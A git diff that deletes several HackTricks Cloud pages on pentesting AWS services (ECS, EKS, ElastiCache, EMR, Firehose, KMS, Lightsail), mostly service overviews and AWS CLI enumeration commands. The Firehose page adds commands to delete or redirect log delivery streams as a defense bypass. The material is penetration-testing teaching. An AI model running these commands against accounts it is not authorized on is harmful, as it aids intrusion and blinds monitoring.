-{% endhint %} - -## ECS - -### Basic Information - -Amazon **Elastic Container Services** or ECS provides a platform to **host containerized applications in the cloud**. ECS has two **deployment** methods, **EC2** instance type and a **serverless** option, **Fargate**. The service **makes running containers in the cloud very easy and pain free**. - -ECS operates using the following three building blocks: **Clusters**, **Services**, and **Task Definitions**. - -* **Clusters** are **groups of containers** that are running in the cloud. As previously mentioned, there are two launch types for containers, EC2 and Fargate. AWS defines the **EC2** launch type as allowing customers “to run \[their] containerized applications on a cluster of Amazon EC2 instances that \[they] **manage**”. **Fargate** is similar and is defined as “\[allowing] you to run your containerized applications **without the need to provision and manage** the backend infrastructure”. -* **Services** are created inside a cluster and responsible for **running the tasks**. Inside a service definition **you define the number of tasks to run, auto scaling, capacity provider (Fargate/EC2/External),** **networking** information such as VPC’s, subnets, and security groups. - * There **2 types of applications**: - * **Service**: A group of tasks handling a long-running computing work that can be stopped and restarted. For example, a web application. - * **Task**: A standalone task that runs and terminates. For example, a batch job. - * Among the service applications, there are **2 types of service schedulers**: - * [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If for some reason a task shut down, a new one is launched in the same or different node. - * [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that has the needed requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies. -* **Task Definitions** are responsible for **defining what containers will run** and the various parameters that will be configured with the containers such as **port mappings** with the host, **env variables**, Docker **entrypoint**... - * Check **env variables for sensitive info**! - -### Sensitive Data In Task Definitions - -Task definitions are responsible for **configuring the actual containers that will be running in ECS**. Since task definitions define how containers will run, a plethora of information can be found within. - -Pacu can enumerate ECS (list-clusters, list-container-instances, list-services, list-task-definitions), it can also dump task definitions. - -### Enumeration - -```bash -# Clusters info -aws ecs list-clusters -aws ecs describe-clusters --clusters - -# Container instances -## An Amazon ECS container instance is an Amazon EC2 instance that is running the Amazon ECS container agent and has been registered into an Amazon ECS cluster. -aws ecs list-container-instances --cluster -aws ecs describe-container-instances --cluster --container-instances - -# Services info -aws ecs list-services --cluster -aws ecs describe-services --cluster --services -aws ecs describe-task-sets --cluster --service - -# Task definitions -aws ecs list-task-definition-families -aws ecs list-task-definitions -aws ecs list-tasks --cluster -aws ecs describe-tasks --cluster --tasks -## Look for env vars and secrets used from the task definition -aws ecs describe-task-definition --task-definition : -``` - -### Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md" %} -[aws-ecs-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md) -{% endcontent-ref %} - -### Privesc - -In the following page you can check how to **abuse ECS permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-ecs-privesc.md" %} -[aws-ecs-privesc.md](../aws-privilege-escalation/aws-ecs-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-ecs-post-exploitation.md" %} -[aws-ecs-post-exploitation.md](../aws-post-exploitation/aws-ecs-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-ecs-persistence.md" %} -[aws-ecs-persistence.md](../aws-persistence/aws-ecs-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md deleted file mode 100644 index b99caa683..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md +++ /dev/null @@ -1,72 +0,0 @@ -# AWS - EKS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EKS - -Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS. - -Key aspects of Amazon EKS include: - -1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates. -2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security. -3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design. -4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment. - -#### Enumeration - -```bash -aws eks list-clusters -aws eks describe-cluster --name -# Check for endpointPublicAccess and publicAccessCidrs - -aws eks list-fargate-profiles --cluster-name -aws eks describe-fargate-profile --cluster-name --fargate-profile-name - -aws eks list-identity-provider-configs --cluster-name -aws eks describe-identity-provider-config --cluster-name --identity-provider-config - -aws eks list-nodegroups --cluster-name -aws eks describe-nodegroup --cluster-name --nodegroup-name - -aws eks list-updates --name -aws eks describe-update --name --update-id -``` - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-eks-post-exploitation.md" %} -[aws-eks-post-exploitation.md](../aws-post-exploitation/aws-eks-post-exploitation.md) -{% endcontent-ref %} - -## References - -* [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-elasticache.md b/pentesting-cloud/aws-security/aws-services/aws-elasticache.md deleted file mode 100644 index 8839a6598..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-elasticache.md +++ /dev/null @@ -1,71 +0,0 @@ -# AWS - ElastiCache - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ElastiCache - -AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports two popular open-source in-memory engines: **Redis and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, allowing developers to offload time-consuming tasks such as provisioning, patching, monitoring, and **backups**. - -### Enumeration - -```bash -# ElastiCache clusters -## Check the SecurityGroups to later check who can access -## In Redis clusters: Check AuthTokenEnabled to see if you need password -## In memcache clusters: You can find the URL to connect -aws elasticache describe-cache-clusters - -# List all ElastiCache replication groups -## Find here the accesible URLs for Redis clusters -aws elasticache describe-replication-groups - -#List all ElastiCache parameter groups -aws elasticache describe-cache-parameter-groups - -#List all ElastiCache security groups -## If this gives an error it's because it's using SGs from EC2 -aws elasticache describe-cache-security-groups - -#List all ElastiCache subnet groups -aws elasticache describe-cache-subnet-groups - -# Get snapshots -aws elasticache describe-snapshots - -# Get users and groups -aws elasticache describe-user-groups -aws elasticache describe-users - -# List ElastiCache events -aws elasticache describe-events -``` - -### Privesc (TODO) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md deleted file mode 100644 index be430d055..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md +++ /dev/null @@ -1,86 +0,0 @@ -# AWS - EMR Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EMR - -AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark. - -Key characteristics include: - -* **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features: - * **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider. - * **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop: - * Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer. - * HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm. -* **Encryption in Transit**: Focuses on securing data during transfer. Options include: - * **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider: - * **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket. - * **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts. - -Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version: - -* **Hadoop**: - * Might reduce encrypted shuffle using TLS. - * Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption. -* **Presto** (EMR version 5.6.0+): - * Internal communication between Presto nodes is secured using SSL and TLS. -* **Tez Shuffle Handler**: - * Utilizes TLS for encryption. -* **Spark**: - * Employs TLS for the Akka protocol. - * Uses Simple Authentication Security Layer and 3DES for Block Transfer Service. - * External shuffle service is secured with the Simple Authentication Security Layer. - -These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases. - -#### Enumeration - -```bash -aws emr list-clusters -aws emr describe-cluster --cluster-id -aws emr list-instances --cluster-id -aws emr list-instance-fleets --cluster-id -aws emr list-steps --cluster-id -aws emr list-notebook-executions -aws emr list-security-configurations -aws emr list-studios #Get studio URLs -``` - -#### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-emr-privesc.md" %} -[aws-emr-privesc.md](../aws-privilege-escalation/aws-emr-privesc.md) -{% endcontent-ref %} - -## References - -* [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md b/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md deleted file mode 100644 index 34909d625..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md +++ /dev/null @@ -1,77 +0,0 @@ -# AWS - Kinesis Data Firehose Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Kinesis Data Firehose - -Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints. - -The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases. - -### Enumeration - -```bash -# Get delivery streams -aws firehose list-delivery-streams - -# Get stream info -aws firehose describe-delivery-stream --delivery-stream-name -## Get roles -aws firehose describe-delivery-stream --delivery-stream-name | grep -i RoleARN -``` - -## Post-exploitation / Defense Bypass - -In case firehose is used to send logs or defense insights, using these functionalities an attacker could prevent it from working properly. - -### firehose:DeleteDeliveryStream - -``` -aws firehose delete-delivery-stream --delivery-stream-name --allow-force-delete -``` - -### firehose:UpdateDestination - -``` -aws firehose update-destination --delivery-stream-name --current-delivery-stream-version-id --destination-id -``` - -### firehose:PutRecord | firehose:PutRecordBatch - -``` -aws firehose put-record --delivery-stream-name my-stream --record '{"Data":"SGVsbG8gd29ybGQ="}' - -aws firehose put-record-batch --delivery-stream-name my-stream --records file://records.json -``` - -## References - -* [https://docs.amazonaws.cn/en\_us/firehose/latest/dev/what-is-this-service.html](https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md deleted file mode 100644 index f1b5c3bdf..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md +++ /dev/null @@ -1,183 +0,0 @@ -# AWS - KMS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## KMS - Key Management Service - -AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys. - -KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**. - -KMS is a **region specific service**. - -**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used. - -**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data. - -A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK. - -There are 2 types of master keys: - -* **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it. -* **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys. - -**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**. - -### Key Policies - -These defines **who can use and access a key in KMS**. - -By **default:** - -* It gives the **IAM of the** **AWS account that owns the KMS key access** to manage the access to the KMS key via IAM. - - Unlike other AWS resource policies, a AWS **KMS key policy does not automatically give permission any of the principals of the account**. To give permission to account administrators, the **key policy must include an explicit statement** that provides this permission, like this one. - - * Without allowing the account(`"AWS": "arn:aws:iam::111122223333:root"`) IAM permissions won't work. -* It **allows the account to use IAM policies** to allow access to the KMS key, in addition to the key policy. - - **Without this permission, IAM policies that allow access to the key are ineffective**, although IAM policies that deny access to the key are still effective. -* It **reduces the risk of the key becoming unmanageable** by giving access control permission to the account administrators, including the account root user, which cannot be deleted. - -**Default policy** example: - -```json -{ - "Sid": "Enable IAM policies", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::111122223333:root" - }, - "Action": "kms:*", - "Resource": "*" -} -``` - -{% hint style="warning" %} -If the **account is allowed** (`"arn:aws:iam::111122223333:root"`) a **principal** from the account **will still need IAM permissions** to use the KMS key. However, if the **ARN** of a role for example is **specifically allowed** in the **Key Policy**, that role **doesn't need IAM permissions**. -{% endhint %} - -
- -Policy Details - -Properties of a policy: - -* JSON based document -* Resource --> Affected resources (can be "\*") -* Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions) -* Effect --> Allow/Deny -* Principal --> arn affected -* Conditions (optional) --> Condition to give the permissions - -Grants: - -* Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...) -* After the grant is created a GrantToken and a GratID are issued - -**Access**: - -* Via **key policy** -- If this exist, this takes **precedent** over the IAM policy -* Via **IAM policy** -* Via **grants** - -
- -### Key Administrators - -Key administrator by default: - -* Have access to manage KMS but not to encrypt or decrypt data -* Only IAM users and roles can be added to Key Administrators list (not groups) -* If external CMK is used, Key Administrators have the permission to import key material - -### Rotation of CMKs - -* The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases. -* **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed. -* **Older keys are retained** to decrypt data that was encrypted prior to the rotation -* In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**. -* If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled. - -#### Manual rotation - -* A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID. -* To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to. -* You need to **keep old keys to decrypt old files** encrypted with it. - -You can import keys from your on-premises key infrastructure . - -### Other relevant KMS information - -KMS is priced per number of encryption/decryption requests received from all services per month. - -KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS. - -With KMS policy you can do the following: - -* Limit who can create data keys and which services have access to use these keys -* Limit systems access to encrypt only, decrypt only or both -* Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions). - -You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region. - -### Enumeration - -```bash -aws kms list-keys -aws kms list-key-policies --key-id -aws kms list-grants --key-id -aws kms describe-key --key-id -aws kms get-key-policy --key-id --policy-name # Default policy name is "default" -aws kms describe-custom-key-stores -``` - -### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-kms-privesc.md" %} -[aws-kms-privesc.md](../aws-privilege-escalation/aws-kms-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-kms-post-exploitation.md" %} -[aws-kms-post-exploitation.md](../aws-post-exploitation/aws-kms-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-kms-persistence.md" %} -[aws-kms-persistence.md](../aws-persistence/aws-kms-persistence.md) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md b/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md deleted file mode 100644 index 3d2778ee1..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md +++ /dev/null @@ -1,85 +0,0 @@ -# AWS - Lightsail Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS - Lightsail - -Amazon Lightsail provides an **easy**, lightweight way for new cloud users to take advantage of AWS’ cloud computing services. It allows you to deploy common and custom web services in seconds via **VMs** (**EC2**) and **containers**.\ -It's a **minimal EC2 + Route53 + ECS**. - -### Enumeration - -```bash -# Instances -aws lightsail get-instances #Get all -aws lightsail get-instance-port-states --instance-name #Get open ports - -# Databases -aws lightsail get-relational-databases -aws lightsail get-relational-database-snapshots -aws lightsail get-relational-database-parameters - -# Disk & snapshots -aws lightsail get-instance-snapshots -aws lightsail get-disk-snapshots -aws lightsail get-disks - -# More -aws lightsail get-load-balancers -aws lightsail get-static-ips -aws lightsail get-key-pairs -``` - -### Analyse Snapshots - -It's possible to generate **instance and relational database snapshots from lightsail**. Therefore you can check those the same way you can check [**EC2 snapshots**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) and [**RDS snapshots**](aws-relational-database-rds-enum.md#enumeration). - -### Metadata - -**Metadata endpoint is accessible from lightsail**, but the machines are running in an **AWS account managed by AWS** so you don't control **what permissions are being granted**. However, if you find a way to exploit those you would be directly exploiting AWS. - -### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-lightsail-privesc.md" %} -[aws-lightsail-privesc.md](../aws-privilege-escalation/aws-lightsail-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-lightsail-post-exploitation.md" %} -[aws-lightsail-post-exploitation.md](../aws-post-exploitation/aws-lightsail-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-lightsail-persistence.md" %} -[aws-lightsail-persistence.md](../aws-persistence/aws-lightsail-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md deleted file mode 100644 index 30e76cde6..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md +++ /dev/null @@ -1,103 +0,0 @@ -# AWS - MQ Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
